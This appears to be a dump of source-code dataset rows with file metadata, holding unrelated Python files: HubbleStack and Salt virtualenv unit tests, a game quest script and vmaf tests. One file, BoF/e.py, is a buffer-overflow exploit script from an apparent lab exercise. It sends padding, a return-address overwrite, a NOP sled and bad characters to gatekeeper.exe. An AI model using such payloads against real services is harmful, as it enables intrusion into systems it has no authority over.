        __tags__ = 'CIS-6.5'
        # Inject the loader dunders the module normally gets from salt.
        hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
        __salt__ = {}

        # Stub for pkg.version: echoing the name back makes the queried
        # package look installed.
        def pkg_version(name):
            return name
        __salt__['pkg.version'] = pkg_version
        hubblestack.files.hubblestack_nova.pkg.__salt__ = __salt__
        val = hubblestack.files.hubblestack_nova.pkg.audit(data_list, __tags__, [], debug=False)
        assert len(val['Success']) != 0
        assert len(val['Failure']) == 0

    def test_audit_for_incorrect_input(self):
        """audit() with an empty data list and an unknown tag returns empty
        result buckets rather than raising."""
        val = {}
        data_list = []
        __tags__ = 'wrong_test_data'
        hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
        __salt__ = {}
        expected_val = {'Failure': [], 'Controlled': [], 'Success': []}

        # Same pkg.version stub as in the success case.
        def pkg_version(name):
            return name
        __salt__['pkg.version'] = pkg_version
        hubblestack.files.hubblestack_nova.pkg.__salt__ = __salt__
        val = hubblestack.files.hubblestack_nova.pkg.audit(data_list, __tags__, [], debug=False)
        assert val == expected_val

    def test_audit_for_value_error(self):
        """audit() given malformed data (a bare string) may raise ValueError;
        the test tolerates either outcome by swallowing only ValueError."""
        val = {}
        data_list = 'wrong_test_data'
        __tags__ = 'CIS-6.5'
        hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
        __salt__ = {}

        def pkg_version(name):
            return name
        __salt__['pkg.version'] = pkg_version
        hubblestack.files.hubblestack_nova.pkg.__salt__ = __salt__
        try:
            val = hubblestack.files.hubblestack_nova.pkg.audit(data_list, __tags__, [], debug=False)
        except ValueError:
            pass

    def test_get_tags(self):
        """_get_tags() indexes checks by their CIS tag for the current
        osfinger; both tags present in the data must be non-empty."""
        hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
        data = {'pkg':
                {'blacklist': [{'talk1': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
                               {'talk2': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}],
                 'whitelist': [{'ssh_ignore_rhosts': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}]}}
        val = hubblestack.files.hubblestack_nova.pkg._get_tags(data)
        assert val['CIS-5.1.4'] != 0
        assert val['CIS-9.3.6'] != 0

    def test_get_tags_for_empty_data(self):
        """_get_tags() on empty pkg data returns an empty mapping."""
        data = {'pkg': {}}
        hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
        ret = hubblestack.files.hubblestack_nova.pkg._get_tags(data)
        assert ret == {}
| 66.656566
| 372
| 0.588422
| 835
| 6,599
| 4.420359
| 0.131737
| 0.041181
| 0.051477
| 0.14278
| 0.764021
| 0.754809
| 0.743972
| 0.743972
| 0.736928
| 0.691412
| 0
| 0.047709
| 0.196393
| 6,599
| 98
| 373
| 67.336735
| 0.648312
| 0
| 0
| 0.423529
| 0
| 0
| 0.38915
| 0.060009
| 0
| 0
| 0
| 0
| 0.105882
| 1
| 0.129412
| false
| 0.011765
| 0.023529
| 0.035294
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d9f7d2e34d2410d7ca09d8e02a2378fb46228fd4
| 140
|
py
|
Python
|
src/core/__init__.py
|
sssr-dev/api-server
|
0647aa56b948b0df4a6f50c34727606156e228d4
|
[
"Apache-2.0"
] | 2
|
2022-03-15T23:30:58.000Z
|
2022-03-18T15:28:46.000Z
|
src/core/__init__.py
|
sssr-dev/api-server
|
0647aa56b948b0df4a6f50c34727606156e228d4
|
[
"Apache-2.0"
] | null | null | null |
src/core/__init__.py
|
sssr-dev/api-server
|
0647aa56b948b0df4a6f50c34727606156e228d4
|
[
"Apache-2.0"
] | null | null | null |
from .init_system import InitSystem, Storage
from .Responses import Responses
from .DBHelp import DBHelp
from .Endpoint import Endpoint
| 28
| 45
| 0.814286
| 18
| 140
| 6.277778
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 140
| 4
| 46
| 35
| 0.94958
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8a1a829b4dbb0c00294b52cd86ddfa171fe338f3
| 914
|
py
|
Python
|
scripts/quest/q21300s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 54
|
2019-04-16T23:24:48.000Z
|
2021-12-18T11:41:50.000Z
|
scripts/quest/q21300s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 3
|
2019-05-19T15:19:41.000Z
|
2020-04-27T16:29:16.000Z
|
scripts/quest/q21300s.py
|
G00dBye/YYMS
|
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
|
[
"MIT"
] | 49
|
2020-11-25T23:29:16.000Z
|
2022-03-26T16:20:24.000Z
|
# 21300 - [Job Adv] (Lv.60) Aran
# Quest dialogue script. `sm` (script manager) and `parentID` are injected
# by the script host at runtime -- they are not defined in this file.
sm.setSpeakerID(1510009)  # NPC delivering this dialogue
sm.sendNext("How is the training going? Hm, Lv. 60? You still ahve a long way to go, but it's definitely praiseworthy compared to the first time I met you. Continue to train diligently, and I'm sure you'll regain your strength soon!")
# Yes/No prompt: accepting starts the quest; declining just ends the script.
if sm.sendAskYesNo("But first, you must head to #b#m140000000##k your #b#p1201001##k is acting weird again. I think it has something to tell you. It might be able to restore your abilities, so please hurry."):
    sm.startQuest(parentID)
    sm.sendSayOkay("Anyway, I thought it was really something that a weapon had its own identity, but this weapon gets extremely annoying. It cries, saying that I'm not paying attention to its needs, and now... Oh, please keep this a secret from the Polearm. I don't think it's a good idea to upset the weapon any more than I already have.")
    sm.dispose()  # release the script context in both branches
else:
    sm.dispose()
| 101.555556
| 341
| 0.742888
| 165
| 914
| 4.115152
| 0.660606
| 0.011782
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.042497
| 0.176149
| 914
| 9
| 342
| 101.555556
| 0.85923
| 0.035011
| 0
| 0.25
| 0
| 0.375
| 0.821793
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a265c3a9d17117b2b41894cda98bd502b87b8e5
| 14,645
|
py
|
Python
|
tests/unit/modules/test_virtualenv.py
|
nevins-b/salt
|
56363bc41ca36e757103df3504d1bb07e3a7251b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/modules/test_virtualenv.py
|
nevins-b/salt
|
56363bc41ca36e757103df3504d1bb07e3a7251b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/modules/test_virtualenv.py
|
nevins-b/salt
|
56363bc41ca36e757103df3504d1bb07e3a7251b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Pedro Algarvio (pedro@algarvio.me)`
tests.unit.modules.virtualenv_test
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libraries
from __future__ import absolute_import
import sys
# Import Salt Testing libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.helpers import TestsLoggingHandler, ForceImportErrorOn
from tests.support.mock import NO_MOCK, NO_MOCK_REASON, MagicMock, patch
# Import salt libs
import salt.modules.virtualenv_mod as virtualenv_mod
from salt.exceptions import CommandExecutionError
@skipIf(NO_MOCK, NO_MOCK_REASON)
@patch('salt.utils.which', lambda bin_name: bin_name)
class VirtualenvTestCase(TestCase, LoaderModuleMockMixin):
    """Unit tests for salt.modules.virtualenv_mod.create(): option-to-flag
    translation, deprecation logging, and virtualenv/pyvenv option
    separation. All shell activity goes through a mocked cmd.run_all."""

    def setup_loader_modules(self):
        """Install a fake ``virtualenv`` module (reporting version 1.9.1)
        into sys.modules and supply the loader dunders the module expects."""
        base_virtualenv_mock = MagicMock()
        base_virtualenv_mock.__version__ = '1.9.1'
        sys_modules_patcher = patch.dict('sys.modules', {'virtualenv': base_virtualenv_mock})
        sys_modules_patcher.start()
        self.addCleanup(sys_modules_patcher.stop)
        return {
            virtualenv_mod: {
                '__opts__': {'venv_bin': 'virtualenv'},
                '_install_script': MagicMock(return_value={'retcode': 0,
                                                           'stdout': 'Installed script!',
                                                           'stderr': ''})
            }
        }

    def test_issue_6029_deprecated_distribute(self):
        """``distribute=True`` maps to --distribute on virtualenv < 1.10 and
        is dropped (with a deprecation log entry) on >= 1.10."""
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create(
                '/tmp/foo', system_site_packages=True, distribute=True
            )
            mock.assert_called_once_with(
                ['virtualenv', '--distribute', '--system-site-packages', '/tmp/foo'],
                runas=None,
                python_shell=False
            )

        with TestsLoggingHandler() as handler:
            # Let's fake a higher virtualenv version
            virtualenv_mock = MagicMock()
            virtualenv_mock.__version__ = '1.10rc1'
            mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
            with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
                with patch.dict('sys.modules', {'virtualenv': virtualenv_mock}):
                    virtualenv_mod.create(
                        '/tmp/foo', system_site_packages=True, distribute=True
                    )
                mock.assert_called_once_with(
                    ['virtualenv', '--system-site-packages', '/tmp/foo'],
                    runas=None,
                    python_shell=False
                )

            # Are we logging the deprecation information?
            self.assertIn(
                'INFO:The virtualenv \'--distribute\' option has been '
                'deprecated in virtualenv(>=1.10), as such, the '
                '\'distribute\' option to `virtualenv.create()` has '
                'also been deprecated and it\'s not necessary anymore.',
                handler.messages
            )

    def test_issue_6030_deprecated_never_download(self):
        """``never_download=True`` maps to --never-download on virtualenv
        < 1.10 and is dropped (with a deprecation log entry) on >= 1.10."""
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create(
                '/tmp/foo', never_download=True
            )
            mock.assert_called_once_with(
                ['virtualenv', '--never-download', '/tmp/foo'],
                runas=None,
                python_shell=False
            )

        with TestsLoggingHandler() as handler:
            mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
            # Let's fake a higher virtualenv version
            virtualenv_mock = MagicMock()
            virtualenv_mock.__version__ = '1.10rc1'
            with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
                with patch.dict('sys.modules',
                                {'virtualenv': virtualenv_mock}):
                    virtualenv_mod.create(
                        '/tmp/foo', never_download=True
                    )
                mock.assert_called_once_with(['virtualenv', '/tmp/foo'],
                                             runas=None,
                                             python_shell=False)

            # Are we logging the deprecation information?
            self.assertIn(
                'INFO:The virtualenv \'--never-download\' option has been '
                'deprecated in virtualenv(>=1.10), as such, the '
                '\'never_download\' option to `virtualenv.create()` has '
                'also been deprecated and it\'s not necessary anymore.',
                handler.messages
            )

    def test_issue_6031_multiple_extra_search_dirs(self):
        """``extra_search_dir`` accepts both a list and a comma-separated
        string; each entry becomes its own --extra-search-dir flag."""
        extra_search_dirs = [
            '/tmp/bar-1',
            '/tmp/bar-2',
            '/tmp/bar-3'
        ]

        # Passing extra_search_dirs as a list
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create(
                '/tmp/foo', extra_search_dir=extra_search_dirs
            )
            mock.assert_called_once_with(
                ['virtualenv',
                 '--extra-search-dir=/tmp/bar-1',
                 '--extra-search-dir=/tmp/bar-2',
                 '--extra-search-dir=/tmp/bar-3',
                 '/tmp/foo'],
                runas=None,
                python_shell=False
            )

        # Passing extra_search_dirs as comma separated list
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create(
                '/tmp/foo', extra_search_dir=','.join(extra_search_dirs)
            )
            mock.assert_called_once_with(
                ['virtualenv',
                 '--extra-search-dir=/tmp/bar-1',
                 '--extra-search-dir=/tmp/bar-2',
                 '--extra-search-dir=/tmp/bar-3',
                 '/tmp/foo'],
                runas=None,
                python_shell=False
            )

    def test_unapplicable_options(self):
        """Options belonging to the other venv tool raise
        CommandExecutionError instead of being silently ignored."""
        # ----- Virtualenv using pyvenv options ----------------------------->
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            self.assertRaises(
                CommandExecutionError,
                virtualenv_mod.create,
                '/tmp/foo',
                venv_bin='virtualenv',
                upgrade=True
            )

        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            self.assertRaises(
                CommandExecutionError,
                virtualenv_mod.create,
                '/tmp/foo',
                venv_bin='virtualenv',
                symlinks=True
            )
        # <---- Virtualenv using pyvenv options ------------------------------

        # ----- pyvenv using virtualenv options ----------------------------->
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock,
                                                  'cmd.which_bin': lambda _: 'pyvenv'}):
            self.assertRaises(
                CommandExecutionError,
                virtualenv_mod.create,
                '/tmp/foo',
                venv_bin='pyvenv',
                python='python2.7'
            )

        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            self.assertRaises(
                CommandExecutionError,
                virtualenv_mod.create,
                '/tmp/foo',
                venv_bin='pyvenv',
                prompt='PY Prompt'
            )

        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            self.assertRaises(
                CommandExecutionError,
                virtualenv_mod.create,
                '/tmp/foo',
                venv_bin='pyvenv',
                never_download=True
            )

        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            self.assertRaises(
                CommandExecutionError,
                virtualenv_mod.create,
                '/tmp/foo',
                venv_bin='pyvenv',
                extra_search_dir='/tmp/bar'
            )
        # <---- pyvenv using virtualenv options ------------------------------

    def test_get_virtualenv_version_from_shell(self):
        """When the virtualenv module cannot be imported the version is
        probed by running the binary; probe failures raise
        CommandExecutionError, and the probed version still controls the
        --never-download deprecation."""
        with ForceImportErrorOn('virtualenv'):

            # ----- virtualenv binary not available ------------------------->
            mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
            with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
                self.assertRaises(
                    CommandExecutionError,
                    virtualenv_mod.create,
                    '/tmp/foo',
                )
            # <---- virtualenv binary not available --------------------------

            # ----- virtualenv binary present but > 0 exit code ------------->
            mock = MagicMock(side_effect=[
                {'retcode': 1, 'stdout': '', 'stderr': 'This is an error'},
                {'retcode': 0, 'stdout': ''}
            ])
            with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
                self.assertRaises(
                    CommandExecutionError,
                    virtualenv_mod.create,
                    '/tmp/foo',
                    venv_bin='virtualenv',
                )
            # <---- virtualenv binary present but > 0 exit code --------------

            # ----- virtualenv binary returns 1.9.1 as its version --------->
            mock = MagicMock(side_effect=[
                {'retcode': 0, 'stdout': '1.9.1'},
                {'retcode': 0, 'stdout': ''}
            ])
            with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
                virtualenv_mod.create(
                    '/tmp/foo', never_download=True
                )
                mock.assert_called_with(
                    ['virtualenv', '--never-download', '/tmp/foo'],
                    runas=None,
                    python_shell=False
                )
            # <---- virtualenv binary returns 1.9.1 as its version ----------

            # ----- virtualenv binary returns 1.10rc1 as its version ------->
            mock = MagicMock(side_effect=[
                {'retcode': 0, 'stdout': '1.10rc1'},
                {'retcode': 0, 'stdout': ''}
            ])
            with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
                virtualenv_mod.create(
                    '/tmp/foo', never_download=True
                )
                mock.assert_called_with(
                    ['virtualenv', '/tmp/foo'],
                    runas=None,
                    python_shell=False
                )
            # <---- virtualenv binary returns 1.10rc1 as its version --------

    def test_python_argument(self):
        """``python=`` becomes --python=<interpreter>."""
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create(
                '/tmp/foo', python=sys.executable,
            )
            mock.assert_called_once_with(
                ['virtualenv', '--python={0}'.format(sys.executable), '/tmp/foo'],
                runas=None,
                python_shell=False
            )

    def test_prompt_argument(self):
        """``prompt=`` is passed through single-quoted, including prompts
        that themselves contain quotes."""
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create('/tmp/foo', prompt='PY Prompt')
            mock.assert_called_once_with(
                ['virtualenv', '--prompt=\'PY Prompt\'', '/tmp/foo'],
                runas=None,
                python_shell=False
            )

        # Now with some quotes on the mix
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create('/tmp/foo', prompt='\'PY\' Prompt')
            mock.assert_called_once_with(
                ['virtualenv', "--prompt=''PY' Prompt'", '/tmp/foo'],
                runas=None,
                python_shell=False
            )

        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create('/tmp/foo', prompt='"PY" Prompt')
            mock.assert_called_once_with(
                ['virtualenv', '--prompt=\'"PY" Prompt\'', '/tmp/foo'],
                runas=None,
                python_shell=False
            )

    def test_clear_argument(self):
        """``clear=True`` becomes --clear."""
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create('/tmp/foo', clear=True)
            mock.assert_called_once_with(
                ['virtualenv', '--clear', '/tmp/foo'],
                runas=None,
                python_shell=False
            )

    def test_upgrade_argument(self):
        """``upgrade=True`` becomes --upgrade (pyvenv only)."""
        # We test for pyvenv only because with virtualenv this is un
        # unsupported option.
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create('/tmp/foo', venv_bin='pyvenv', upgrade=True)
            mock.assert_called_once_with(
                ['pyvenv', '--upgrade', '/tmp/foo'],
                runas=None,
                python_shell=False
            )

    def test_symlinks_argument(self):
        """``symlinks=True`` becomes --symlinks (pyvenv only)."""
        # We test for pyvenv only because with virtualenv this is un
        # unsupported option.
        mock = MagicMock(return_value={'retcode': 0, 'stdout': ''})
        with patch.dict(virtualenv_mod.__salt__, {'cmd.run_all': mock}):
            virtualenv_mod.create('/tmp/foo', venv_bin='pyvenv', symlinks=True)
            mock.assert_called_once_with(
                ['pyvenv', '--symlinks', '/tmp/foo'],
                runas=None,
                python_shell=False
            )
| 41.253521
| 93
| 0.513076
| 1,374
| 14,645
| 5.203057
| 0.130277
| 0.089103
| 0.045461
| 0.073996
| 0.785564
| 0.762764
| 0.753252
| 0.718982
| 0.712547
| 0.689047
| 0
| 0.009341
| 0.349403
| 14,645
| 354
| 94
| 41.370057
| 0.740974
| 0.099078
| 0
| 0.602113
| 0
| 0
| 0.154624
| 0.019775
| 0
| 0
| 0
| 0
| 0.088028
| 1
| 0.038732
| false
| 0
| 0.03169
| 0
| 0.077465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a40ecd712456d496991403730a5138a1a6da70c
| 1,759
|
py
|
Python
|
BoF/e.py
|
StefanAustin/pentesting
|
c3b828a7b00fa5f22b87b319d4d7b0de0741d3c3
|
[
"MIT"
] | 1
|
2021-08-04T18:38:51.000Z
|
2021-08-04T18:38:51.000Z
|
BoF/e.py
|
StefanAustin/pentesting
|
c3b828a7b00fa5f22b87b319d4d7b0de0741d3c3
|
[
"MIT"
] | null | null | null |
BoF/e.py
|
StefanAustin/pentesting
|
c3b828a7b00fa5f22b87b319d4d7b0de0741d3c3
|
[
"MIT"
] | 1
|
2020-12-10T08:56:46.000Z
|
2020-12-10T08:56:46.000Z
|
#06-20-2020 DC: This is a client, not a server.
#06-20-2020 DC: This e.py script will send badchars for testing.
#06-20-2020 DC: This time, I know that \x0A is not going to work in the gatekeeper.exe application, so I'll replace it
#06-20-2020 DC: with a \x09 to see if that makes it through to the dump.
#!/usr/bin/python
# Bad-character probe for a buffer-overflow exercise against gatekeeper.exe.
# NOTE(review): Python 2 script -- socket.send() is given str payloads;
# under Python 3 these would need to be bytes.
import socket

target_host = "10.0.2.7"
target_port = 31337

# Byte values \x01-\xff with \x0a replaced by a second \x09 (see the
# header note) so the payload keeps its full length without the byte
# the target mangles. \x00 is omitted entirely.
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
nops = "\x90" * 15  # short NOP sled ahead of the probe bytes
# 142 filler bytes then 4 "B"s -- presumably the saved-return-address
# overwrite found earlier; confirm the offset in the debugger.
payload = "A" * 142 + "B" * 4 + nops + badchars + "\x0A" * 2

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((target_host,target_port))
# Protocol preamble the target expects before the overflowing "220 " line.
client.send("GET / HTTP/1.0\r\nHOST: 10.0.2.7\r\n\r\n")
client.send("220 " + payload + "\r\n")
response = client.recv(4096)  # read back whatever the service answers
| 54.96875
| 134
| 0.7112
| 389
| 1,759
| 3.200514
| 0.845758
| 0.012851
| 0.025703
| 0.032129
| 0.033735
| 0
| 0
| 0
| 0
| 0
| 0
| 0.238037
| 0.073337
| 1,759
| 31
| 135
| 56.741935
| 0.525767
| 0.181353
| 0
| 0
| 0
| 0.473684
| 0.756794
| 0.710801
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.052632
| 0
| 0.052632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8a4981ede43a7a5ca18fe7ff6ff514e6ce231002
| 1,996
|
py
|
Python
|
python/test/executor_test.py
|
robbie-nichols/vmaf
|
37c2232e78c7ea25758fee70801d5f2141f5e059
|
[
"Apache-2.0"
] | 2
|
2020-10-08T01:49:25.000Z
|
2021-05-20T03:16:59.000Z
|
python/test/executor_test.py
|
weizhou-geek/vmaf
|
d5978d15f7c413e8aa78c891ce43291ead3fa287
|
[
"Apache-2.0"
] | null | null | null |
python/test/executor_test.py
|
weizhou-geek/vmaf
|
d5978d15f7c413e8aa78c891ce43291ead3fa287
|
[
"Apache-2.0"
] | 2
|
2021-03-03T10:00:36.000Z
|
2021-03-03T10:11:10.000Z
|
import unittest
from vmaf.core.asset import Asset
from vmaf.core.executor import Executor
__copyright__ = "Copyright 2016-2019, Netflix, Inc."
__license__ = "Apache, Version 2.0"
class ExecutorTest(unittest.TestCase):
    """Tests for Executor._get_workfile_yuv_type()."""

    def test_get_workfile_yuv_type(self):
        """The workfile YUV type defaults to yuv420p, follows whichever of
        ref/dis declares a concrete yuv type, and a ref/dis mismatch of two
        concrete yuv types is an assertion error."""
        # No yuv types declared: fall back to yuv420p.
        asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
                      asset_dict={}, workdir_root="my_workdir_root")
        self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv420p')

        # Both sides 'notyuv': still the default.
        asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
                      asset_dict={'ref_yuv_type': 'notyuv', 'dis_yuv_type': 'notyuv'}, workdir_root="my_workdir_root")
        self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv420p')

        # Only ref declares a concrete type: use it.
        asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
                      asset_dict={'ref_yuv_type': 'yuv444p', 'dis_yuv_type': 'notyuv'}, workdir_root="my_workdir_root")
        self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv444p')

        # Two different concrete types: constructing/querying the asset
        # must trip an AssertionError.
        with self.assertRaises(AssertionError):
            asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
                          asset_dict={'ref_yuv_type': 'yuv444p', 'dis_yuv_type': 'yuv420p'}, workdir_root="my_workdir_root")
            self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv444p')

        # Only dis declares a concrete type: use it.
        asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
                      asset_dict={'ref_yuv_type': 'notyuv', 'dis_yuv_type': 'yuv422p'}, workdir_root="my_workdir_root")
        self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv422p')

        # Both sides agree on a concrete type: use it.
        asset = Asset(dataset="test", content_id=0, asset_id=0, ref_path="", dis_path="",
                      asset_dict={'ref_yuv_type': 'yuv444p', 'dis_yuv_type': 'yuv444p'}, workdir_root="my_workdir_root")
        self.assertEqual(Executor._get_workfile_yuv_type(asset), 'yuv444p')
| 53.945946
| 124
| 0.668337
| 260
| 1,996
| 4.730769
| 0.173077
| 0.096748
| 0.079675
| 0.102439
| 0.790244
| 0.790244
| 0.790244
| 0.790244
| 0.790244
| 0.790244
| 0
| 0.03567
| 0.185371
| 1,996
| 36
| 125
| 55.444444
| 0.720787
| 0
| 0
| 0.423077
| 0
| 0
| 0.197896
| 0
| 0
| 0
| 0
| 0
| 0.269231
| 1
| 0.038462
| false
| 0
| 0.115385
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
